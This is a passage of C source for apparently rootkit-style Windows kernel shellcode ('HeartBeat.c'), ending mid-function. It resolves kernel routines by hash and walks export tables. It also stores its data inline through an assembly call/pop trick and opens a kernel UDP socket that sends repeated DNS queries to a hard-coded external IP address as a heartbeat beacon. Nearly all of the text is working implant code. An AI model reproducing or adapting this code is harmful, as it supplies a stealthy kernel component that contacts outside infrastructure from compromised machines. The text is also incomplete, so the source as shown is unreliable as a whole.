/*----------------------------------------------------------------------------+
|                                                                             |
|   HeartBeat.c                                                               |
|                                                                             |             
-----------------------------------------------------------------------------*/

#include "ntddk.h"
#include "wsk.h"
#include "aux_klib.h"
#include "types.h"

#pragma section(".code",execute,read,write)
#pragma comment(linker,"/MERGE:.text=.code")
#pragma comment(linker,"/MERGE:.data=.code")
#pragma comment(linker,"/SECTION:.code,ERW")
#pragma code_seg(".code")

/*----------------------------------------------------------------------------+
|                                                                             |
|   Shellcode Globals                                                         |
|                                                                             |             
-----------------------------------------------------------------------------*/

typedef ULONG		(*DbgPrintPtr)(IN PCHAR* _Format,...);
typedef HANDLE		(*PsGetCurrentThreadIdPtr)();
typedef NTSTATUS	(*WskRegisterPtr)(__in PWSK_CLIENT_NPI WskClientNpi,__out PWSK_REGISTRATION WskRegistration);
typedef NTSTATUS	(*WskCaptureProviderNPIPtr)(__in PWSK_REGISTRATION WskRegistration,__in ULONG WaitTimeout,__out PWSK_PROVIDER_NPI WskProviderNpi);
typedef PMDL		(*IoAllocateMdlPtr)(IN PVOID VirtualAddress,IN ULONG Length,IN BOOLEAN SecondaryBuffer,IN BOOLEAN ChargeQuota,IN OUT PIRP Irp OPTIONAL);
typedef VOID		(*MmBuildMdlForNonPagedPoolPtr)(IN OUT PMDL  MemoryDescriptorList);
typedef VOID		(*IoFreeIrpPtr)(IN PIRP Irp);
typedef PIRP		(*IoAllocateIrpPtr)(IN CCHAR  StackSize, IN BOOLEAN  ChargeQuota);
typedef void		(*DoDNSQueriesPtr)(DWORD nQueries, DWORD netioAddress, DWORD shellcodeBaseAddress);

#pragma pack(1)
typedef struct _WSK_APP_SOCKET_CONTEXT
{
    
    WSK_CLIENT_DISPATCH		WskAppDispatch;		
    WSK_CLIENT_NPI			wskClientNpi;			
    WSK_REGISTRATION		WskRegistration;		
    DWORD					WSK_WAIT_TIMEOUT;					
    WSK_PROVIDER_NPI		wskProviderNpi;		
    PWSK_SOCKET				socket;						
    SOCKADDR_IN				localAddress;				
    SOCKADDR_IN				remoteAddress;

}WSK_APP_SOCKET_CONTEXT, *PWSK_APP_SOCKET_CONTEXT;
#pragma pack()

#define SZ_BUFFER		16		
#define SZ_DNS_QUERY    30		
#define SZ_DNS_BUFFER   512		

#pragma pack(1)
typedef struct GD_
{
	DbgPrintPtr						dbgPrintPtr;
	PsGetCurrentThreadIdPtr			psGetCurrentThreadIdPtr;
	WskRegisterPtr					wskRegisterPtr;
	WskCaptureProviderNPIPtr		wskCaptureProviderNPIPtr;
	IoAllocateMdlPtr				ioAllocateMdlPtr;
	MmBuildMdlForNonPagedPoolPtr	mmBuildMdlForNonPagedPoolPtr;
	IoFreeIrpPtr					ioFreeIrpPtr;
	IoAllocateIrpPtr				ioAllocateIrpPtr;
	BYTE							recvIRPComplete;
	BYTE							sendIRPComplete;
	BYTE							dnsQuery[SZ_DNS_QUERY]; 
	PMDL							dnsMDL;                    
	BYTE							dnsBuffer[SZ_DNS_BUFFER];  
	WSK_BUF							DatagramSendBuffer;
	WSK_BUF							DatagramRecvBuffer;
	WSK_APP_SOCKET_CONTEXT			socketContext;
	char							stringConst_0001[SZ_BUFFER];	
	char							stringConst_0002[SZ_BUFFER];	
	DWORD							shellcodeBaseAddress;
	PIO_COMPLETION_ROUTINE			CreateSocketIRPCompletePtr;
	PIO_COMPLETION_ROUTINE			BindSocketIRPCompletePtr;
	PIO_COMPLETION_ROUTINE			SetRemoteIRPCompletePtr;
	PIO_COMPLETION_ROUTINE			SendDatagramIRPCompletePtr;
	PIO_COMPLETION_ROUTINE			RecvDatagramIRPCompletePtr;
}GD;
#pragma pack()

/*----------------------------------------------------------------------------+
|                                                                             |
|   Logic Entry and Exit Points                                               |
|                                                                             |             
-----------------------------------------------------------------------------*/

unsigned int GlobalDataRoutine();
BOOLEAN populateNTImportPtrs(GD *gd);
BOOLEAN populateOtherImportPtrs(GD *gd, DWORD baseAddress);
void initDNSSocketContext(PWSK_APP_SOCKET_CONTEXT socketContext);
NTSTATUS createDNSSocket(GD *gd, PWSK_APP_SOCKET_CONTEXT socketContext);
NTSTATUS CreateSocketIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS getLocalTransportAddress(PWSK_APP_SOCKET_CONTEXT socketContext);
NTSTATUS BindSocket(GD *gd, PWSK_APP_SOCKET_CONTEXT socketContext);
NTSTATUS BindSocketIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS setRemoteAddress(GD *gd, PWSK_APP_SOCKET_CONTEXT socketContext);
NTSTATUS SetRemoteIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS sendDatagram(GD *gd, PWSK_APP_SOCKET_CONTEXT socketContext, PWSK_BUF buff);
NTSTATUS SendDatagramIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS recvDatagram(GD *gd, PWSK_APP_SOCKET_CONTEXT socketContext, PWSK_BUF buff);
NTSTATUS RecvDatagramIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS CreateSocketIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS BindSocketIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS SetRemoteIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS SendDatagramIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);
NTSTATUS RecvDatagramIRPComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context);

void doDNSQueries(DWORD nQueries, DWORD netioAddress, DWORD shellcodeBaseAddress)
{
	GD* gd;
	NTSTATUS ntStatus;
    DWORD i;
	DWORD j;

	gd = (GD*)GlobalDataRoutine();
	if(nQueries==0)
	{
		(*gd).shellcodeBaseAddress = shellcodeBaseAddress;
		if(populateNTImportPtrs(gd)==FALSE)
		{
			return;
		}
		if(populateOtherImportPtrs(gd,netioAddress)==FALSE)
		{
			return;
		}
		initDNSSocketContext(&((*gd).socketContext));
		ntStatus = (*gd).wskRegisterPtr
		(
			&(((*gd).socketContext).wskClientNpi), 
			&(((*gd).socketContext).WskRegistration)
		);
		if(!NT_SUCCESS(ntStatus)) 
		{
			return;
		}
		ntStatus = (*gd).wskCaptureProviderNPIPtr
		(
			&(((*gd).socketContext).WskRegistration), 
			((*gd).socketContext).WSK_WAIT_TIMEOUT,
			&(((*gd).socketContext).wskProviderNpi)
		);
		if(!NT_SUCCESS(ntStatus))
		{
			return;
		}
		ntStatus = createDNSSocket(gd,&((*gd).socketContext));
		if(!NT_SUCCESS(ntStatus))
		{
			return;
		}
		ntStatus = getLocalTransportAddress(&((*gd).socketContext));
		if(!NT_SUCCESS(ntStatus))
		{
			return;
		}
		ntStatus = BindSocket(gd, &((*gd).socketContext));
		if(!NT_SUCCESS(ntStatus))
		{
			return;
		}
		ntStatus = setRemoteAddress(gd, &((*gd).socketContext));
		if(!NT_SUCCESS(ntStatus))
		{
			return;
		}

		return;
	}
	(*gd).sendIRPComplete = TRUE;
	(*gd).recvIRPComplete = TRUE;
	for(j=0;j<nQueries;j++)
	{
		while(((*gd).sendIRPComplete==FALSE)||((*gd).recvIRPComplete==FALSE)){}
		(*gd).dnsMDL = (*gd).ioAllocateMdlPtr
		(
			(*gd).dnsBuffer,
			SZ_DNS_BUFFER,
			FALSE,
			FALSE,
			NULL
		);
		(*gd).mmBuildMdlForNonPagedPoolPtr((*gd).dnsMDL);
		for(i=0;i<SZ_DNS_QUERY;i++){ (*gd).dnsBuffer[i]=(*gd).dnsQuery[i]; }
		(*gd).DatagramSendBuffer.Mdl	= (*gd).dnsMDL;
		(*gd).DatagramSendBuffer.Offset = 0;
		(*gd).DatagramSendBuffer.Length = SZ_DNS_QUERY;
		ntStatus = sendDatagram(gd,&((*gd).socketContext),&((*gd).DatagramSendBuffer));
		if(!NT_SUCCESS(ntStatus))
		{
			return;
		}
		(*gd).DatagramRecvBuffer.Mdl	= (*gd).dnsMDL;
		(*gd).DatagramRecvBuffer.Offset = 0;
		(*gd).DatagramRecvBuffer.Length = SZ_DNS_BUFFER;
		ntStatus = recvDatagram(gd,&((*gd).socketContext),&((*gd).DatagramRecvBuffer));
		if(!NT_SUCCESS(ntStatus))
		{
			return;
		}
		(*gd).sendIRPComplete = FALSE;
		(*gd).recvIRPComplete = FALSE;
	}
	return;
}/*end doDNSQueries()--------------------------------------------------------*/

/*----------------------------------------------------------------------------+
|                                                                             |
|   Global Data Storage Area                                                  |
|                                                                             |             
-----------------------------------------------------------------------------*/

#include "GetNTCalls.c"		
#include "ShellCode.h"		
#define VAR_BYTE(name)					__asm _emit 0x01
#define VAR_WORD(name)					__asm _emit 0x02 __asm _emit 0x02 
#define VAR_DWORD(name)					__asm _emit 0x04 __asm _emit 0x04 __asm _emit 0x04 __asm _emit 0x04
#define VAR_QWORD(name)					__asm _emit 0x08 __asm _emit 0x08 __asm _emit 0x08 __asm _emit 0x08 \
										__asm _emit 0x08 __asm _emit 0x08 __asm _emit 0x08 __asm _emit 0x08
#define STR_DEF_01(name,a1)							__asm _emit a1 
#define STR_DEF_02(name,a1,a2)						__asm _emit a1 __asm _emit a2 
#define STR_DEF_04(name,a1,a2,a3,a4)				__asm _emit a1 __asm _emit a2 __asm _emit a3 __asm _emit a4
#define STR_DEF_08(name,a1,a2,a3,a4,a5,a6,a7,a8)	__asm _emit a1 __asm _emit a2 __asm _emit a3 __asm _emit a4 \
													__asm _emit a5 __asm _emit a6 __asm _emit a7 __asm _emit a8
#define HASH_WskRegister			0x000732a8
#define HASH_WskCaptureProviderNPI	0x1c98d342
#define SZ_ADDRESS_BUFFER 512

unsigned int GlobalDataRoutine()
{
	unsigned int globalDataAddress;
	__asm
	{
		call endOfData
		VAR_DWORD(DbgPrintPtr)
		VAR_DWORD(PsGetCurrentThreadIdPtr)
		VAR_DWORD(WskRegisterPtr)
		VAR_DWORD(WskCaptureProviderNPIPtr)
		VAR_DWORD(IoAllocateMdlPtr)
		VAR_DWORD(MmBuildMdlForNonPagedPoolPtr)
		VAR_DWORD(IoFreeIrpPtr)
		VAR_DWORD(IoAllocateIrpPtr)
		VAR_BYTE(recvIRPComplete)
		VAR_BYTE(sendIRPComplete)
		STR_DEF_02(dnsQuery,0x00,0x02)
		STR_DEF_02(dnsQuery,0x01,0x00)	
		STR_DEF_02(dnsQuery,0x00,0x01)
		STR_DEF_02(dnsQuery,0x00,0x00)	
		STR_DEF_02(dnsQuery,0x00,0x00)	
		STR_DEF_02(dnsQuery,0x00,0x00)	
		STR_DEF_08(dnsQuery, 0x03, 0x77, 0x77, 0x77, 0x04, 0x63, 0x77, 0x72)
		STR_DEF_04(dnsQuery, 0x75, 0x03, 0x65, 0x64)
		STR_DEF_02(dnsQuery, 0x75, 0x00)
		STR_DEF_02(dnsQuery,0x00,0x01)	
		STR_DEF_02(dnsQuery,0x00,0x01)	
		VAR_DWORD(dnsMDL)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_QWORD(dnsBuffer)
		VAR_DWORD(DatagramSendBuffer)
		VAR_DWORD(DatagramSendBuffer)
		VAR_DWORD(DatagramSendBuffer)
		VAR_DWORD(DatagramRecvBuffer)
		VAR_DWORD(DatagramRecvBuffer)
		VAR_DWORD(DatagramRecvBuffer)
		VAR_QWORD(socketContext)
		VAR_QWORD(socketContext)
		VAR_QWORD(socketContext)
		VAR_QWORD(socketContext)
		VAR_QWORD(socketContext)
		VAR_QWORD(socketContext)
		VAR_QWORD(socketContext)
		VAR_QWORD(socketContext)
		VAR_QWORD(socketContext)
		VAR_QWORD(socketContext)
		STR_DEF_08(stringConst_0001,'[','T','I','D',']',':','%','0')
		STR_DEF_08(stringConst_0001,'8','X',']','\0','\0','\0','\0','\0')
		STR_DEF_08(stringConst_0002,'[','%','s',']',':',' ','%','s')
		STR_DEF_08(stringConst_0002,'\n','\0','\0','\0','\0','\0','\0','\0')
		VAR_DWORD(shellcodeBaseAddress)
		VAR_DWORD(CreateSocketIRPCompletePtr)
		VAR_DWORD(BindSocketIRPCompletePtr)
		VAR_DWORD(SetRemoteIRPCompletePtr)
		VAR_DWORD(SendDatagramIRPCompletePtr)
		VAR_DWORD(RecvDatagramIRPCompletePtr)
		endOfData:
		pop eax
		mov globalDataAddress,eax
	}
	return(globalDataAddress);
}/*end GlobalDataRoutine()---------------------------------------------------*/

BOOLEAN populateNTImportPtrs(GD *gd)
{
	DWORD routineAddress;
	DWORD i;

	if(GetNTLibAddress(&routineAddress,HASH_DbgPrint)==FALSE){ return(FALSE); }
	(*gd).dbgPrintPtr					= (DbgPrintPtr)routineAddress;
	if(GetNTLibAddress(&routineAddress,HASH_PsGetCurrentThreadId)==FALSE){ return(FALSE); }
	(*gd).psGetCurrentThreadIdPtr		= (PsGetCurrentThreadIdPtr)routineAddress;
	if(GetNTLibAddress(&routineAddress,HASH_IoAllocateMdl)==FALSE){ return(FALSE); }
	(*gd).ioAllocateMdlPtr				= (IoAllocateMdlPtr)routineAddress;
	if(GetNTLibAddress(&routineAddress,HASH_MmBuildMdlForNonPagedPool)==FALSE){ return(FALSE); }
	(*gd).mmBuildMdlForNonPagedPoolPtr	= (MmBuildMdlForNonPagedPoolPtr)routineAddress;
	if(GetNTLibAddress(&routineAddress,HASH_IoFreeIrp)==FALSE){ return(FALSE); }
	(*gd).ioFreeIrpPtr					= (IoFreeIrpPtr)routineAddress;
	if(GetNTLibAddress(&routineAddress,HASH_IoAllocateIrp)==FALSE){ return(FALSE); }
	(*gd).ioAllocateIrpPtr				= (IoAllocateIrpPtr)routineAddress;
	(*gd).CreateSocketIRPCompletePtr	= CreateSocketIRPComplete;
	(*gd).BindSocketIRPCompletePtr		= BindSocketIRPComplete;
	(*gd).SetRemoteIRPCompletePtr		= SetRemoteIRPComplete;
	(*gd).SendDatagramIRPCompletePtr	= SendDatagramIRPComplete;
	(*gd).RecvDatagramIRPCompletePtr	= RecvDatagramIRPComplete;
	(*gd).CreateSocketIRPCompletePtr	= (PIO_COMPLETION_ROUTINE)((*gd).shellcodeBaseAddress + (DWORD)0x00000A62);
	(*gd).BindSocketIRPCompletePtr		= (PIO_COMPLETION_ROUTINE)((*gd).shellcodeBaseAddress + (DWORD)0x00000AAC);
	(*gd).SetRemoteIRPCompletePtr		= (PIO_COMPLETION_ROUTINE)((*gd).shellcodeBaseAddress + (DWORD)0x00000AEA);
	(*gd).SendDatagramIRPCompletePtr	= (PIO_COMPLETION_ROUTINE)((*gd).shellcodeBaseAddress + (DWORD)0x00000B18);
	(*gd).RecvDatagramIRPCompletePtr	= (PIO_COMPLETION_ROUTINE)((*gd).shellcodeBaseAddress + (DWORD)0x00000B66);
	return(TRUE);
}/*end populateNTImportPtrs()------------------------------------------------*/
 
BOOLEAN populateOtherImportPtrs(GD *gd, DWORD baseAddress)
{
	DWORD routineAddress;
	if(walkExportList(baseAddress,&routineAddress,HASH_WskRegister)==FALSE){ return(FALSE); }
	(*gd).wskRegisterPtr			= (WskRegisterPtr)routineAddress;
	if(walkExportList(baseAddress,&routineAddress,HASH_WskCaptureProviderNPI)==FALSE){ return(FALSE); }
	(*gd).wskCaptureProviderNPIPtr	= (WskCaptureProviderNPIPtr)routineAddress;
	return(TRUE);
}/*end populateOtherImportPtrs()---------------------------------------------*/

/*----------------------------------------------------------------------------+
|                                                                             |
|   IRP Completion                                                            |
|                                                                             |             
-----------------------------------------------------------------------------*/

void MyIoSetCompletionRoutine
(
    PIRP Irp,
    PIO_COMPLETION_ROUTINE CompletionRoutine,
    PVOID Context,
	BOOLEAN InvokeOnSuccess,
    BOOLEAN InvokeOnError,
    BOOLEAN InvokeOnCancel
)
{
    PIO_STACK_LOCATION irpSp;
    ASSERT( (InvokeOnSuccess || InvokeOnError || InvokeOnCancel) ? (CompletionRoutine != NULL) : TRUE );
    irpSp = IoGetNextIrpStackLocation(Irp);		
    irpSp->CompletionRoutine = CompletionRoutine;
    irpSp->Context = Context;
    irpSp->Control = 0;
    if (InvokeOnSuccess){irpSp->Control = SL_INVOKE_ON_SUCCESS; }
    if (InvokeOnError){ irpSp->Control |= SL_INVOKE_ON_ERROR; }
    if (InvokeOnCancel){ irpSp->Control |= SL_INVOKE_ON_CANCEL; }
	return;
}/*end MyIoSetCompletionRoutine()--------------------------------------------*/

NTSTATUS CreateSocketIRPComplete
(
    PDEVICE_OBJECT DeviceObject,
    PIRP Irp,
    PVOID Context
)
{
	GD* gd;
    PWSK_APP_SOCKET_CONTEXT socketContext;
    UNREFERENCED_PARAMETER(DeviceObject);
	gd = (GD*)GlobalDataRoutine();
	populateNTImportPtrs(gd);
	if ((*Irp).IoStatus.Status == STATUS_SUCCESS)
    {
        socketContext = (PWSK_APP_SOCKET_CONTEXT)Context;
        (*socketContext).socket = (PWSK_SOCKET)((*Irp).IoStatus).Information;
    }
	(*gd).ioFreeIrpPtr(Irp);
    return(STATUS_MORE_PROCESSING_REQUIRED);
}/*end CreateSocketIRPComplete()---------------------------------------------*/

NTSTATUS BindSocketIRPComplete
(
    PDEVICE_OBJECT DeviceObject,
    PIRP Irp,
    PVOID Context
)
{
	GD* gd;
    PWSK_APP_SOCKET_CONTEXT socketContext;
    UNREFERENCED_PARAMETER(DeviceObject);
	gd = (GD*)GlobalDataRoutine();
	populateNTImportPtrs(gd);
	if ((*Irp).IoStatus.Status == STATUS_SUCCESS)
    {
        socketContext = (PWSK_APP_SOCKET_CONTEXT)Context;
    }
	(*gd).ioFreeIrpPtr(Irp);
    return(STATUS_MORE_PROCESSING_REQUIRED);
}/*end BindSocketIRPComplete()-----------------------------------------------*/

NTSTATUS SetRemoteIRPComplete
(
    PDEVICE_OBJECT DeviceObject,
    PIRP Irp,
    PVOID Context
)
{
	GD* gd;
    UNREFERENCED_PARAMETER(DeviceObject);
    UNREFERENCED_PARAMETER(Context);
	gd = (GD*)GlobalDataRoutine();
	populateNTImportPtrs(gd);
	(*gd).ioFreeIrpPtr(Irp);
    return(STATUS_MORE_PROCESSING_REQUIRED);
}/*end SetRemoteIRPComplete()------------------------------------------------*/

NTSTATUS SendDatagramIRPComplete
(
    PDEVICE_OBJECT DeviceObject,
    PIRP Irp,
    PVOID Context
)
{
	GD* gd;
    PWSK_BUF datagramBuffer;
    DWORD byteCount;
    UNREFERENCED_PARAMETER(DeviceObject);
	gd = (GD*)GlobalDataRoutine();
	populateNTImportPtrs(gd);
	if ((*Irp).IoStatus.Status == STATUS_SUCCESS)
    {
        datagramBuffer = (PWSK_BUF)Context;
        byteCount = (ULONG)(Irp->IoStatus.Information);
    }
	(*gd).ioFreeIrpPtr(Irp);
	(*gd).sendIRPComplete = TRUE;
    return(STATUS_MORE_PROCESSING_REQUIRED);
}/*end SendDatagramIRPComplete()---------------------------------------------*/

NTSTATUS RecvDatagramIRPComplete
(
    PDEVICE_OBJECT DeviceObject,
    PIRP Irp,
    PVOID Context
)
{
	GD* gd;
    PWSK_BUF datagramBuffer;
    DWORD byteCount;
    DWORD i;
    UNREFERENCED_PARAMETER(DeviceObject);
	gd = (GD*)GlobalDataRoutine();
	populateNTImportPtrs(gd);
	if ((*Irp).IoStatus.Status == STATUS_SUCCESS)
    {
        datagramBuffer = (PWSK_BUF)Context;
        byteCount = (ULONG)(Irp->IoStatus.Information);
    }
	(*gd).ioFreeIrpPtr(Irp);
	(*gd).recvIRPComplete = TRUE;
    return(STATUS_MORE_PROCESSING_REQUIRED);
}/*end RecvDatagramIRPComplete()---------------------------------------------*/

NTSTATUS CloseSocketIRPComplete
(
    PDEVICE_OBJECT DeviceObject,
    PIRP Irp,
    PVOID Context
)
{
	GD* gd;
    PWSK_APP_SOCKET_CONTEXT socketContext;
    UNREFERENCED_PARAMETER(DeviceObject);
	gd = (GD*)GlobalDataRoutine();
	populateNTImportPtrs(gd);
	if ((*Irp).IoStatus.Status == STATUS_SUCCESS)
    {
        socketContext = (PWSK_APP_SOCKET_CONTEXT)Context;
    }
	(*gd).ioFreeIrpPtr(Irp);
    return(STATUS_MORE_PROCESSING_REQUIRED);
}/*end CloseSocketIRPComplete()----------------------------------------------*/

/*----------------------------------------------------------------------------+
|                                                                             |
|   Core App-Specific Routines                                                |
|                                                                             |             
-----------------------------------------------------------------------------*/

void initDNSSocketContext(PWSK_APP_SOCKET_CONTEXT socketContext)
{
    DWORD i;
    (*socketContext).WskAppDispatch.Version = MAKE_WSK_VERSION(1,0);
    (*socketContext).WskAppDispatch.Reserved = 0;
    (*socketContext).WskAppDispatch.WskClientEvent=NULL; 
    (*socketContext).wskClientNpi.ClientContext=NULL;
    (*socketContext).wskClientNpi.Dispatch=&((*socketContext).WskAppDispatch);
    (*socketContext).WSK_WAIT_TIMEOUT =15;	
    (*socketContext).remoteAddress.sin_family=AF_INET;
    (*socketContext).remoteAddress.sin_port=(USHORT)0x3500; 
    (*socketContext).remoteAddress.sin_addr.S_un.S_addr=0xB24C5744; 
    for(i=0;i<8;i++){ (*socketContext).remoteAddress.sin_zero[i]=0; }
   
    return;
}/*end initDNSSocketContext()------------------------------------------------*/

NTSTATUS createDNSSocket(GD* gd, PWSK_APP_SOCKET_CONTEXT socketContext)
{
	PIRP irp;
    WSK_PROVIDER_NPI wskProviderNpi;
    NTSTATUS ntStatus;
    irp = (*gd).ioAllocateIrpPtr(1,FALSE);
	if (irp==NULL){ return(STATUS_INSUFFICIENT_RESOURCES); }
	MyIoSetCompletionRoutine
	(
		irp,								//IN PIRP  Irp
		(*gd).CreateSocketIRPCompletePtr,	//IN PIO_COMPLETION_ROUTINE  CompletionRoutine
		socketContext,						//IN PVOID  Context 
		TRUE,								//IN BOOLEAN    InvokeOnSuccess
		TRUE,								//IN BOOLEAN  InvokeOnError
		TRUE								//IN BOOLEAN  InvokeOnCancel
    );
    wskProviderNpi = (*socketContext).wskProviderNpi;
	ntStatus = (*(wskProviderNpi.Dispatch)).WskSocket
	(
		wskProviderNpi.Client,		//IN PWSK_CLIENT  Client
		AF_INET,					//IN ADDRESS_FAMILY  AddressFamily
		SOCK_DGRAM,					//IN USHORT  SocketType
		IPPROTO_UDP,				//IN ULONG  Protocol
		WSK_FLAG_DATAGRAM_SOCKET,	//IN ULONG  Flags
		NULL,			            //IN PVOID  SocketContext OPTIONAL (for callbacks)
		NULL,						//IN CONST VOID  *Dispatch OPTIONAL (for callbacks)
		NULL,						//IN PEPROCESS  OwningProcess OPTIONAL
		NULL,						//IN PETHREAD  OwningThread OPTIONAL
		NULL,						//IN PSECURITY_DESCRIPTOR  SecurityDescriptor OPTIONAL
		irp							//IN PIRP  Irp
	);
    return(ntStatus);
}/*end createDNSSocket()-----------------------------------------------------*/

NTSTATUS getLocalTransportAddress(PWSK_APP_SOCKET_CONTEXT socketContext)
{
    PWSK_PROVIDER_DATAGRAM_DISPATCH dispatch;
    NTSTATUS ntStatus;
    BYTE LocalAddressBuffer[SZ_ADDRESS_BUFFER];
    DWORD nBytesReturned;
    PSOCKET_ADDRESS_LIST socketAddressList;
    SOCKET_ADDRESS  socketAddress;
    SOCKADDR_IN localAddress;
    dispatch = (PWSK_PROVIDER_DATAGRAM_DISPATCH)(*((*socketContext).socket)).Dispatch;
    ntStatus = (*dispatch).WskControlSocket
	(
        (*socketContext).socket,    //IN PWSK_SOCKET  Socket
        WskIoctl,                   //IN WSK_CONTROL_SOCKET_TYPE  RequestType
        SIO_ADDRESS_LIST_QUERY,     //IN ULONG  ControlCode
        0,                          //IN ULONG  Level
        0,                          //IN SIZE_T  InputSize
        NULL,                       //IN PVOID  InputBuffer OPTIONAL
        SZ_ADDRESS_BUFFER,          //IN SIZE_T  OutputSize
        LocalAddressBuffer,         //OUT PVOID  OutputBuffer OPTIONAL
        &nBytesReturned,            //OUT SIZE_T *OutputSizeReturned OPTIONAL
        NULL                        //IN PIRP  Irp OPTIONAL
	);
    if(NT_SUCCESS(ntStatus))
    {
        socketAddressList = (PSOCKET_ADDRESS_LIST)LocalAddressBuffer;
        socketAddress = (*socketAddressList).Address[0];
        localAddress = *((PSOCKADDR_IN)socketAddress.lpSockaddr);  
        (*socketContext).localAddress = localAddress;
    }
    return(ntStatus);
}/*end getLocalTransportAddress()--------------------------------------------*/

NTSTATUS BindSocket(GD *gd, PWSK_APP_SOCKET_CONTEXT socketContext)
{
	PIRP irp;
    PWSK_PROVIDER_DATAGRAM_DISPATCH dispatch;
    NTSTATUS ntStatus;
    irp = (*gd).ioAllocateIrpPtr(1,FALSE);
	if (irp==NULL){ return(STATUS_INSUFFICIENT_RESOURCES); }
	MyIoSetCompletionRoutine
	(
		irp,							//IN PIRP  Irp
		(*gd).BindSocketIRPCompletePtr,	//IN PIO_COMPLETION_ROUTINE  CompletionRoutine
		socketContext,					//IN PVOID  Context 
		TRUE,							//IN BOOLEAN    InvokeOnSuccess
		TRUE,							//IN BOOLEAN  InvokeOnError
		TRUE							//IN BOOLEAN  InvokeOnCancel
    );
    dispatch = (PWSK_PROVIDER_DATAGRAM_DISPATCH)(*((*socketContext).socket)).Dispatch;
    ntStatus = (*dispatch).WskBind
    (
        (*socketContext).socket,
        (PSOCKADDR)&((*socketContext).localAddress),
        0,  // No flags
        irp
    );
    return(ntStatus);
}/*end bindSocket()----------------------------------------------------------*/

NTSTATUS setRemoteAddress(GD *gd, PWSK_APP_SOCKET_CONTEXT socketContext)
{
    PIRP irp;
    NTSTATUS ntStatus;
    DWORD i;
    PWSK_PROVIDER_DATAGRAM_DISPATCH dispatch;
    SOCKADDR_IN remoteAddress;
    irp = (*gd).ioAllocateIrpPtr(1,FALSE);
	if (irp==NULL){ return(STATUS_INSUFFICIENT_RESOURCES); }
	MyIoSetCompletionRoutine
	(
		irp,							//IN PIRP  Irp
		(*gd).SetRemoteIRPCompletePtr,	//IN PIO_COMPLETION_ROUTINE  CompletionRoutine
		NULL,							//IN PVOID  Context 
		TRUE,							//IN BOOLEAN    InvokeOnSuccess
		TRUE,							//IN BOOLEAN  InvokeOnError
		TRUE							//IN BOOLEAN  InvokeOnCancel
    );
    remoteAddress = (*socketContext).remoteAddress;
    dispatch = (PWSK_PROVIDER_DATAGRAM_DISPATCH)(*((*socketContext).socket)).Dispatch;
    ntStatus = (*dispatch).WskControlSocket
	(
        (*socketContext).socket,    //IN PWSK_SOCKET  Socket
        WskIoctl,                   //IN WSK_CONTROL_SOCKET_TYPE  RequestType
        SIO_WSK_SET_SENDTO_ADDRESS, //IN ULONG  ControlCode
        0,                          //IN ULONG  Level
        sizeof(SOCKADDR_IN),        //IN SIZE_T  InputSize
        &remoteAddress,             //IN PVOID  InputBuffer OPTIONAL
        0,                          //IN SIZE_T  OutputSize
        NULL,                       //OUT PVOID  OutputBuffer OPTIONAL
        NULL,                       //OUT SIZE_T *OutputSizeReturned OPTIONAL
        irp                         //IN PIRP  Irp OPTIONAL
	);
    return(ntStatus);
}/*end setRemoteAddress()----------------------------------------------------*/

NTSTATUS sendDatagram(GD *gd, PWSK_APP_SOCKET_CONTEXT socketContext, PWSK_BUF buff)
{
    NTSTATUS ntStatus;
    PIRP irp;
    PWSK_PROVIDER_DATAGRAM_DISPATCH dispatch;
    irp = (*gd).ioAllocateIrpPtr(1,FALSE);
	if (irp==NULL){ return(STATUS_INSUFFICIENT_RESOURCES); }
	MyIoSetCompletionRoutine
	(
